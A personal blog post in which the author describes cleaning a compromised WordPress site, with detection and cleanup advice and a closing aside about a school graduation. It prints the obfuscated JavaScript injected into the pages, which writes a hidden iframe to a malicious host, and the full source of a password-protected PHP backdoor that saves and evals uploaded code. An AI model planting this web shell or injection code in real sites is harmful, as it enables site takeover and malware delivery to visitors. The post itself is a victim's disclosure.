Brian's World

Virii Warning

Fast news coming down from my blog updates, if you’ve visited this site in Internet Explorer in the past week, there is a chance you may have gotten a virus. Instead of my usual writings, you would have found a blank page with nothing there. Firefox seems to be smart enough to know to avoid doing anything, but IE might have downloaded a bad file. The file would be in your temporary internet files, likely called wp-stats[1].htm. If you do feel you might have downloaded this virus, please run a virus scanning program. The symantec security response page is here with more information about the file (at least as my computer caught it).

Essentially several of my pages has some javascript inserted into them that generated an iframe to download files off another site. My first thought was SQL injection, because blogs tend to be susceptible to those types of things. phpMyAdmin yielded a clean database. I started going through all my files in ftp and found this strange chunk of code

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

Essentially all that obfuscation is used to hide the iframe, and the real purpose of the javascript. I deleted it from all the files it was in (which was several) and started to figure out how they got there. I’m not 100% sure, but I did find several files that did not belong, all named like net_[wordpress filename].php. A good example is net_wp-comments.php. I opened that file up, and it was definately malicious… it would take a file sent from a form and write that file to the current directory.

<?php
@error_reporting(E_ALL);
@set_time_limit(0);
global $HTTP_SERVER_VARS;

define('PASSWD','46fe61e5238b5a873dab30ace493d58d');

function say($t) {
echo "$t\n";
};

function testdata($t) {
say(md5("mark_$t"));
};

echo "<pre>";
testdata('start');
if (md5($_POST["p"]) == PASSWD) {
if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
$HTTP_POST_FILES["s"]["size"])) {
if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
{
testdata('save_ok');
};
//eval($code);
} else {
testdata('save_fail');
};

if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
$HTTP_POST_FILES["f"]["size"]))
{
eval($code);
testdata('ok');
} else {
testdata('fail');
};

} else {
testdata('pass');
};

testdata('end');
echo "</pre>";
?>

???????? ????? ????????
I imagine once one of these got in, it was used to write several other copies. I also found a “hidden” directory serving what looked like search engine gaming stuff. I put hidden in quotes because my filezilla didn’t understand the . in the name meant to hide it.. but I caught it. I think we’re clean for now. If your blog is sending people to a blank page, and you can see your browser status bar connecting to wp-stats-php.info, you are infected. I would turn off your index.php page (rename it to something else so people can’t get to your site) and scour every file for the malicious javascript. I found all the files modified at the same date/time, and the code was always at the bottom of a php file. I would also look for any files that don’t belong in a wordpress install, like having a net_wp-stat.php in addition to the wp-stat.php. If you open those files up in a text editor and scrol down (the text is placed very far down, close to the middle) you’ll see lots of lines that start with @, which turns any error logging or output off. You’ll want to delete those files. Mine looked like it has some password protection on it (http authentication) where the hash was “dc696e9e1af6d06e67a526de29b37e54”. The safest way to address this may be to backup your datebase, blow away your wordpress install, and start from scratch. If you’re like me and lack a backup, try to clean any files in wp-admin, as well as your wp-config files, and see if you can generate a backup/export from your admin interface. Use firefox when you do this! It looked like the file uploaders joined my directories back in april (or so the modified date indicates), but they weren’t used until Friday to overwrite my content.

In others news, SHHS had their graduation yesterday. Congraduations to all those who graduated. I am confident you did a great job! The speeched were pretty bad, especially the class presidents and the retiring principal from the middle school. They both had good things to say, and plenty of nice closing lines. Unfortunately there were too many closing lines per speech, I cannot tolerate more than 1 or 2 closings. Any more than that and I get very frustrated at your attempts to trick me into applauding. You might think your speech is that good, but its probably not. It didn’t help that there was a fire alarm going off in the building behind the graduation site.. at least the fire trucks tried to come quietly.

I had other news to share I think, but I am tired.